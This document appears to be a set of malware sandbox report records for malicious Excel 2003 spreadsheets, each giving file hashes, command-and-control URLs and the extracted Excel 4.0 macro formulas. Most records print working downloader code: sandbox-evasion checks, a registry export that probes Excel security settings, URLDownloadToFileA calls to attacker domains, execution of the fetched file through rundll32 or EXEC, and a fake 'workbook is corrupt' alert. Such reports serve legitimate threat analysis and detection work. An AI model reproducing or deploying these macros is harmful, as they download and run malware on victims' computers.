{"version":"0.2","sample":{"sample":"","kind":"file","target":"04eaa0c9da98a7dfc1e9f3221a502a7fc7cd505909551eb0c0e0227e958c42eb"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"04eaa0c9da98a7dfc1e9f3221a502a7fc7cd505909551eb0c0e0227e958c42eb","filesize":209920,"md5":"a439c29750903554b7110d8ed2a5996d","sha1":"46d34fed5f08e895e4f2460d530b55fdf81c296e","sha256":"04eaa0c9da98a7dfc1e9f3221a502a7fc7cd505909551eb0c0e0227e958c42eb","sha512":"8f3c9aa153218b7f02360f9b0351cf02252c62d5b1c25ea360762ec26398a175dfaeba571dd6994b0579f35fc0b2d398acfb5b803b3ea975012a824e48275962","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"04eaa0c9da98a7dfc1e9f3221a502a7fc7cd505909551eb0c0e0227e958c42eb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WhEInzcsWf\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"04f8e385528c44d9d23e7c8e31537e265140a1f26c5b45eccf661fa561623fb0"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"04f8e385528c44d9d23e7c8e31537e265140a1f26c5b45eccf661fa561623fb0","filesize":145920,"md5":"44f047d50537da5b08d0f4ec68d45f88","sha1":"c7f437ed00d23dcc8b1c1e53e04b0f3fb0646019","sha256":"04f8e385528c44d9d23e7c8e31537e265140a1f26c5b45eccf661fa561623fb0","sha512":"0198bcf2b4a1824b0611e278118fb73beef1fe0a7177b30593d2e859c089df452d2663eae5c8565f198cbb81169d682ccc7173570d177aafd1634477a8d81901","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"04f8e385528c44d9d23e7c8e31537e265140a1f26c5b45eccf661fa561623fb0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"iq54LFq2BP\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"050b8d38baf47084d0e0b85b5e7a712bddcfb42b572c3b4f1af222a9b7f76b65"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"050b8d38baf47084d0e0b85b5e7a712bddcfb42b572c3b4f1af222a9b7f76b65","filesize":168448,"md5":"9f1afef66c043f6c7eafe4cdb87abfdf","sha1":"edc7eee0b8ff0c098c241444eb812ade9a300bcc","sha256":"050b8d38baf47084d0e0b85b5e7a712bddcfb42b572c3b4f1af222a9b7f76b65","sha512":"ad0cb69f305f813d06b5207f7743ff3282242709098659312814b7dcad327b7c2c8cda60ed2a93fea461315eb48a011d3e6b2767e2474707b8bd9ef18c99d206","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"050b8d38baf47084d0e0b85b5e7a712bddcfb42b572c3b4f1af222a9b7f76b65.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OoK4aHpNGp\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0516bcb7a2bfa2b4fe0f19849b35bc5965f07f1d6abaaf40e6bbf55f96938983"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"0516bcb7a2bfa2b4fe0f19849b35bc5965f07f1d6abaaf40e6bbf55f96938983","filesize":170496,"md5":"0322dfbe3c7d58e116b7fb990cec7fa5","sha1":"d06f6be8aff39817051ebc51aa1ddb87c0a7629d","sha256":"0516bcb7a2bfa2b4fe0f19849b35bc5965f07f1d6abaaf40e6bbf55f96938983","sha512":"f291150dc305c2f095dad2fe9edecac850b41e7386eea5d84c336611e1e38205d13120202dee41a08d9c0fd6c0a33501b0bd0b3d7929d3fa54770819b29f4e80","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0516bcb7a2bfa2b4fe0f19849b35bc5965f07f1d6abaaf40e6bbf55f96938983.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VubcPQKfzq\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"05219f8c047f1dff861634c4b50d4f6978c87c35f4c14d21ee9d757cac9280cf"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"05219f8c047f1dff861634c4b50d4f6978c87c35f4c14d21ee9d757cac9280cf","filesize":152576,"md5":"c2c760703862f07d032d3dd6b6d9e36d","sha1":"8033e3b4ba5b15d9c8c7dccf8a4ea7ccb1affd23","sha256":"05219f8c047f1dff861634c4b50d4f6978c87c35f4c14d21ee9d757cac9280cf","sha512":"018b92c4143cc429812bb7589bad105a68f055d14fc4fce5704d958d5e58497ae432bb8ebe226c5083d7e34d539c858345b843f64e4d376a9faba9aef27f045f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"05219f8c047f1dff861634c4b50d4f6978c87c35f4c14d21ee9d757cac9280cf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LBGE0AyK3r\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0522823ab778f1431e791ebdf7d65f24af92b396c777cdc05301c32b253cf717"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"0522823ab778f1431e791ebdf7d65f24af92b396c777cdc05301c32b253cf717","filesize":352768,"md5":"0699c309d3b98d61757a10339f8db0b9","sha1":"3cad79a5288d12d1436fade591a325fa7f41fc40","sha256":"0522823ab778f1431e791ebdf7d65f24af92b396c777cdc05301c32b253cf717","sha512":"6533c25fe32661fd30f8aba1a5aae870d764ae93fda3dbfe9b3965c5a459256424cc23a2f1a792cc64a956db4b37a368344718e11a0101a869b1c3bf52a0334e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0522823ab778f1431e791ebdf7d65f24af92b396c777cdc05301c32b253cf717.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"FOPEN(\"c:\\excel.txt\",3)\nVBA.INSERT.FILE(\"c:\\excel.txt\")\nRUN(\"createcabfile\",FALSE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0546f5ed2e2d70f71a6d8bf22fc9e1ebf404b8748807778090c7fc8ed8007656"},"analysis":{"reported":"2020-04-09T16:14:42Z","score":10},"files":[{"filename":"0546f5ed2e2d70f71a6d8bf22fc9e1ebf404b8748807778090c7fc8ed8007656","filesize":147968,"md5":"e823674d482ed1d45517a123f0cd52c5","sha1":"57a32572629b4f34383e3de23669a11d1f50efa6","sha256":"0546f5ed2e2d70f71a6d8bf22fc9e1ebf404b8748807778090c7fc8ed8007656","sha512":"ae29f8dc0c835bab6fd5975edc045b8a1cca233d004b75336235b71d9cea689b81582ae1706687823e6779029fdcf55b91e09d04c6ccc2d4c347aca1013b1d69","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0546f5ed2e2d70f71a6d8bf22fc9e1ebf404b8748807778090c7fc8ed8007656.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"Afj2lIhJc6\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"055198f22f2009c434ad8dc286fabe2289802ac37be5cfa6c2efed224ddddf16"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"055198f22f2009c434ad8dc286fabe2289802ac37be5cfa6c2efed224ddddf16","filesize":160768,"md5":"66f42a3f4c57b4c1b48a9e553267dda4","sha1":"34b790522d392500598b0be4ff7b3fa94e9e9b07","sha256":"055198f22f2009c434ad8dc286fabe2289802ac37be5cfa6c2efed224ddddf16","sha512":"b9d7d4ac7dcf091f5cc4145c859c8f40bc72aa62760070c8ec824554530d0ed4d4feac4f5a04a8a29aae1f2a0a7b12568907fadcff9b7a4acb7dc7b36ea1efab","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"055198f22f2009c434ad8dc286fabe2289802ac37be5cfa6c2efed224ddddf16.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cc3X0YxDcS\",TRUE)\nGOTO(IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),))\nIF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\nIF(R$5C$11\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\nCLOSE(FALSE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"055953c76884668afdd10fde1365b3911f9ea6a0bf7aae69cfe148c5619d3eff"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"055953c76884668afdd10fde1365b3911f9ea6a0bf7aae69cfe148c5619d3eff","filesize":113664,"md5":"9b83f4765c8e4185d7928ec518e8d70d","sha1":"e38852f08866fd394f2d605397e8fc8281e4584d","sha256":"055953c76884668afdd10fde1365b3911f9ea6a0bf7aae69cfe148c5619d3eff","sha512":"081a95770e491b97f3744c33ed32dbab63cbbb0da15a742633e54c043b4cb4db853ebc04a3c0b465096052ae0de0278c6a8ecf6fae62d2fc462fcb79d13618ce","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"055953c76884668afdd10fde1365b3911f9ea6a0bf7aae69cfe148c5619d3eff.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"hNfqpV0FMK\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"056740ddb23e23315d4ce36dd6c9d279eec6fc72c56196f703464e75baf5ba5a"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"056740ddb23e23315d4ce36dd6c9d279eec6fc72c56196f703464e75baf5ba5a","filesize":209408,"md5":"cc264fde8099642ecc5bde2a25e6d107","sha1":"b8e0f1174710e29df83e6bf7c7ff11910763cfdc","sha256":"056740ddb23e23315d4ce36dd6c9d279eec6fc72c56196f703464e75baf5ba5a","sha512":"489a87b2fb1c3d9743595e40c30b54d1c6417ec27b2512861ef0115ac2e6890d42b31a267b580062c44fe38da0a74a3f8f949dcdb9361c444a6e786a0784c027","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"056740ddb23e23315d4ce36dd6c9d279eec6fc72c56196f703464e75baf5ba5a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VhiHSUdEwL\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"057b5d2b59f4ef81e66d654c5fbe18c2827bba473ab741506be4ebfbf6ca7a00"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"057b5d2b59f4ef81e66d654c5fbe18c2827bba473ab741506be4ebfbf6ca7a00","filesize":209920,"md5":"f0af58ee424ea06aa166fcc43b3a2f96","sha1":"ff5371a830e76a4f684c1105075c40a4c1a2dfa0","sha256":"057b5d2b59f4ef81e66d654c5fbe18c2827bba473ab741506be4ebfbf6ca7a00","sha512":"db3c5a84db917f8e6671e5b1a962731b7c1e03aaa4cf3d32b99140d059792c3a78ce882a8a10be1d823cfa11ae824c53b3a75dd77cadd01dfb98a6057df8b450","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"057b5d2b59f4ef81e66d654c5fbe18c2827bba473ab741506be4ebfbf6ca7a00.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YiagOKTNr7\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"05867b758eadd3d6542038e6cc60518e38f136aa77653c9b31028e43c466e692"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"05867b758eadd3d6542038e6cc60518e38f136aa77653c9b31028e43c466e692","filesize":167936,"md5":"b1f8f2f9ca6d8b61b42c0ba59d6aa2b4","sha1":"7ea12c7c0777ed78bdb76c16c192b432ddf37956","sha256":"05867b758eadd3d6542038e6cc60518e38f136aa77653c9b31028e43c466e692","sha512":"125332e94126ab133654317d811d56be5ebacbe89f9b210319a165fa6a8aff40aec3c63d72193a308105c7b3ebf21988c3053ee450e18a088c2e85cd7f5d06a6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"05867b758eadd3d6542038e6cc60518e38f136aa77653c9b31028e43c466e692.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XOCejecmLb\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0587bcf4df8976cfcf038b7d009a32f887f664ee677a5f79526e257d8e699363"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"0587bcf4df8976cfcf038b7d009a32f887f664ee677a5f79526e257d8e699363","filesize":185344,"md5":"7cbd9955aaa6b031ebd33777e9afb3e9","sha1":"5a3cce999bce97ace742763f403537e10cd06848","sha256":"0587bcf4df8976cfcf038b7d009a32f887f664ee677a5f79526e257d8e699363","sha512":"09cb37f85465d52eec6a5b4504592c708907c057a2d3f55eed3c0fc91a13313d7706b8555e15210c064915c7e5dd51840bd7fdd465bffe330404a6706f146940","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0587bcf4df8976cfcf038b7d009a32f887f664ee677a5f79526e257d8e699363.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"058e66f55a97874b3f4b02cec3f25c493ab975b648ceb34ed6b5f3aca9f95845"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"058e66f55a97874b3f4b02cec3f25c493ab975b648ceb34ed6b5f3aca9f95845","filesize":116224,"md5":"79d07569d2c9d85ac1c5e425a4a9d556","sha1":"a0d9ffad154de8523efa0e9e46cf6d199c83952d","sha256":"058e66f55a97874b3f4b02cec3f25c493ab975b648ceb34ed6b5f3aca9f95845","sha512":"37d9b4887f529e2f345b176d32081cab80878869c296342f88dba3314fa805e3d8a63b74ed3825bb731f1d84ba5df8001f97431e12cc8c0e1aa67395f822e15d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"058e66f55a97874b3f4b02cec3f25c493ab975b648ceb34ed6b5f3aca9f95845.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xCk8YxYMgG\",TRUE)\nGOTO(R$1C$10)"}}}]}
